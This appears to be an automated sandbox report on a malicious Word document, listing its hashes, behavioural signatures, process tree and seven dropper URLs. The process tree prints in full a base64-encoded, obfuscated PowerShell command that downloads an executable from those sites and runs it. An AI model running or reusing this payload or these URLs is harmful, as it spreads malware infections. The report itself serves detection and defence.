Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 11:13

General

  • Target

    E3-20200929_200000.doc

  • Size

    170KB

  • MD5

    342e167fec542940a45d557ad0c2a957

  • SHA1

    9d2010b03ebdcc0c0e619e42ee4f9e156b56e72c

  • SHA256

    088d3fddb3c0dbb04979bbb194eefdf0cd9c0be2c4f5d9986c437efba2830ba0

  • SHA512

    47f91199b8444e6477d1c5b75b76b1078f30bcddcac60b7c046c21a37f822fbc1d0a5ddaffa7528594367ac259d5935cc152cfe9c9578b4442d20051fe214925

  • SSDEEP

    1536:i67OxDiGmrYL7+chKas7V7tq9jD4RuqM1VeNqQigvwAD/IHz:j74iH8Zcag7tWLyN9igYA7IT

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.cyclodeli.com/wp-admin/m/

exe.dropper

https://radiocristianalasvegas.com/wp-includes/wkA138w3S/

exe.dropper

http://skaosclub.com/wp-content/bUdvlTm9D/

exe.dropper

http://iniarsitek.com/wp-content/jkCz/

exe.dropper

https://vlcomercio.com.br/wp-includes/oef5i/

exe.dropper

http://www.yuryyulan.com/wp-includes/XPXi0L/

exe.dropper

http://creativeignite.com/wp-content/fnEhE/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\E3-20200929_200000.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2716
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABXADgAdAB2AHcAegBoAD0AKAAoACcAQQBzACcAKwAnADIAbgAnACkAKwAnAF8AJwArACcAZgB6ACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAHIATwBGAEkATABlAFwAaQB2AHcAOQBpAHoAOABcAGgAMwBuAHcAXwBJADAAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBjAHUAYABSAGAASQBUAHkAUABSAG8AVABgAG8AYwBPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIAJwApACsAKAAnACwAIAAnACsAJwB0ACcAKQArACcAbABzACcAKwAnADEAMQAnACsAKAAnACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQAQgAzAHYANQB4ADYAegAgAD0AIAAoACgAJwBJAG8AJwArACcAYwB0ADkAJwApACsAJwBnADAAJwApADsAJABSADAAbwAzAGYAbQA2AD0AKAAnAFYAJwArACgAJwBoACcAKwAnADkAMQBtAGQAbQAnACkAKQA7ACQARgB3AGQAeQB1AHMAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEsAegAnACsAJwBWAEkAJwApACsAKAAnAHYAdwA5AGkAegAnACsAJwA4ACcAKQArACcASwAnACsAKAAnAHoAJwArACcAVgBIACcAKQArACcAMwAnACsAKAAnAG4AdwBfAGkAMAAnACsAJwBLAHoAJwApACsAJwBWACcAKQAuACIAcgBgAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAGgAYQByAF0ANwA1ACsAWwBDAGgAYQByAF0AMQAyADIAKwBbAEMAaABhAHIAXQA4ADYAKQAsACcAXAAnACkAKQArACQAQgAzAHYANQB4ADYAegArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQASwA0ADgAMgAwAHQAZgA9ACgAJwBDAGQAJwArACgAJwBrAHYAJwArACcAZgBwACcAKQArACcAcQAnACkAOwAkAFkAMABkADEAaAAxAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AdwBlAGIAQwBMAEkAZQBuAHQAOwAkAEkAMABsADQAZgB2ADAAPQAoACcAaAB0ACcAKwAoACcAdABwADoAJwArACcALwAnACsAJwAvAHcAdwB3AC4AYwAnACkAKwAoACcAeQAnACsAJwBjACcAKwAnAGwAbwBkAGUAbABpAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAoACcAdwBwAC0AJwArACcAYQBkACcAKwAnAG0AaQAnACkAKwAoACcAbgAvAG0AJwArACcALwAqAGgAJwArACcAdAAnACkAKwAoACcAdABwACcAKwAnAHMAOgAvACcAKQArACcALwByACcAKwAnAGEAJwArACcAZAAnACsAJwBpACcAKwAnAG8AJwArACgAJwBjACcAKwAnAHIAaQAnACkAKwAoACcAcwAnACsAJwB0AGkAYQAnACkAKwAnAG4AJwArACcAYQAnACsAKAAnAGwAYQBzAHYAZQAnACsAJwBnACcAKQArACcAYQAnACsAJwBzAC4AJwArACcAYwAnACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHcAJwArACcAcAAtAGkAbgAnACsAJwBjAGwAJwApACsAKAAnAHUAJwArACcAZABlACcAKQArACcAcwAvACcAKwAoACcAdwBrAEEAJwArACcAMQAnACkAKwAoACcAMwA4ACcAKwAnAHcAJwApACsAJwAzAFMAJwArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6AC8AJwApACsAKAAnAC8AcwBrAGEAJwArACcAbwAnACkAKwAoACcAcwBjAGwAJwArACcAdQBiACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvACcAKwAnAHcAcAAtAGMAJwApACsAKAAnAG8AbgAnACsAJwB0ACcAKQArACcAZQBuACcAKwAoACcAdAAnACsAJwAvAGIAJwApACsAKAAnAFUAJwArACcAZAB2AGwAJwApACsAJwBUACcAKwAnAG0AJwArACgAJwA5ACcAKwAnAEQALwAnACkAKwAnACoAJwArACgAJwBoACcAKwAnAHQAdABwACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGkAbgAnACsAKAAnAGkAYQByAHMAJwArACcAaQB0AGUAawAnACkAKwAnAC4AYwAnACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBjACcAKQArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKQArACgAJwBqAGsAJwArACcAQwAnACkAKwAoACcAegAvACcAKwAnACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAJwArACcAcwA6AC8ALwB2ACcAKwAnAGwAYwBvAG0AJwArACcAZQByAGMAaQBvAC4AYwBvACcAKwAnAG0AJwApACsAJwAuACcAKwAnAGIAcgAnACsAJwAvAHcAJwArACgAJwBwACcAKwAnAC0AaQAnACkAKwAoACcAbgBjAGwAJwArACcAdQBkAGUAcwAvAG8AZQBmACcAKwAnADUAaQAvACcAKQArACcAKgAnACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AdwB3ACcAKQArACgAJwB3ACcAKwAnAC4AeQAnACsAJwB1AHIAeQB5AHUAJwApACsAJwBsAGEAJwArACgAJwBuACcAKwAnAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGkAbgBjAGwAJwArACcAdQBkAGUAcwAvACcAKQArACgAJwBYAFAAJwArACcAWAAnACkAKwAnAGkAJwArACcAMAAnACsAJwBMAC8AJwArACgAJwAqAGgAJwArACcAdAAnACkAKwAnAHQAcAAnACsAKAAnADoALwAvACcAKwAnAGMAcgBlAGEAJwApACsAJwB0ACcAKwAoACcAaQB2AGUAaQAnACsAJwBnACcAKwAnAG4AaQB0AGUAJwArACcALgBjACcAKQArACcAbwAnACsAKAAnAG0ALwB3AHAAJwArACcALQBjACcAKQArACgAJwBvACcAKwAnAG4AdAAnACkAKwAoACcAZQBuACcAKwAnAHQALwAnACkAKwAoACcAZgBuACcAKwAnAEUAJwApACsAKAAnAGgAJwArACcARQAvACcAKQApAC4AIgBTAGAAcABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAYQA4AHkAawBwAHkAPQAoACgAJwBSADkAdQA0ACcAKwAnAGgAJwApACsAJwAwADkAJwApADsAZgBvAHIAZQBhAGMAaAAoACQARABiAG0AbwBlAHQAZAAgAGkAbgAgACQASQAwAGwANABmAHYAMAApAHsAdAByAHkAewAkAFkAMABkADEAaAAxAG0ALgAiAGQATwBgAHcATgBsAGAAbwBhAEQAZgBpAGAAbABFACIAKAAkAEQAYgBtAG8AZQB0AGQALAAgACQARgB3AGQAeQB1AHMAMAApADsAJABCAHAAZQBlAGoAaQB1AD0AKAAoACcAVgAnACsAJwBqAHoAJwApACsAJwBiACcAKwAoACcAYgBqACcAKwAnAHkAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGQAeQB1AHMAMAApAC4AIgBMAGUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA3ADkAMAAxACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEYAdwBkAHkAdQBzADAAKQA7ACQARwAzAG0AaAB6AG4AMAA9ACgAJwBHACcAKwAoACcAZAAnACsAJwBhAF8AbgA5AGUAJwApACkAOwBiAHIAZQBhAGsAOwAkAEIAdQAyAGsAbQBxADIAPQAoACgAJwBUACcAKwAnADUAYgAnACsAJwAyAHgAeAAnACkAKwAnAHAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGIAOQBnAHcAYgBuAD0AKAAoACcARQAnACsAJwBhAGEAJwApACsAJwBmACcAKwAoACcAdABmACcAKwAnAHIAJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2740

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2420-37-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-47-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-46-0x0000000005B70000-0x0000000005C70000-memory.dmp

      Filesize

      1024KB

    • memory/2420-5-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-7-0x0000000005D70000-0x0000000005E70000-memory.dmp

      Filesize

      1024KB

    • memory/2420-6-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-8-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-9-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-10-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-12-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-19-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-18-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-29-0x0000000005B70000-0x0000000005C70000-memory.dmp

      Filesize

      1024KB

    • memory/2420-26-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-17-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-16-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-13-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-15-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-11-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-21-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2420-0-0x000000002F201000-0x000000002F202000-memory.dmp

      Filesize

      4KB

    • memory/2420-2-0x00000000718DD000-0x00000000718E8000-memory.dmp

      Filesize

      44KB

    • memory/2420-42-0x0000000005B70000-0x0000000005C70000-memory.dmp

      Filesize

      1024KB

    • memory/2420-43-0x0000000005B70000-0x0000000005C70000-memory.dmp

      Filesize

      1024KB

    • memory/2420-41-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-40-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-39-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-38-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-33-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-65-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-66-0x0000000005B70000-0x0000000005C70000-memory.dmp

      Filesize

      1024KB

    • memory/2420-32-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-31-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-30-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-59-0x00000000718DD000-0x00000000718E8000-memory.dmp

      Filesize

      44KB

    • memory/2420-60-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-61-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-64-0x00000000003F0000-0x00000000004F0000-memory.dmp

      Filesize

      1024KB

    • memory/2420-63-0x0000000005B70000-0x0000000005C70000-memory.dmp

      Filesize

      1024KB

    • memory/2740-53-0x000000001B5A0000-0x000000001B882000-memory.dmp

      Filesize

      2.9MB

    • memory/2740-54-0x00000000029E0000-0x00000000029E8000-memory.dmp

      Filesize

      32KB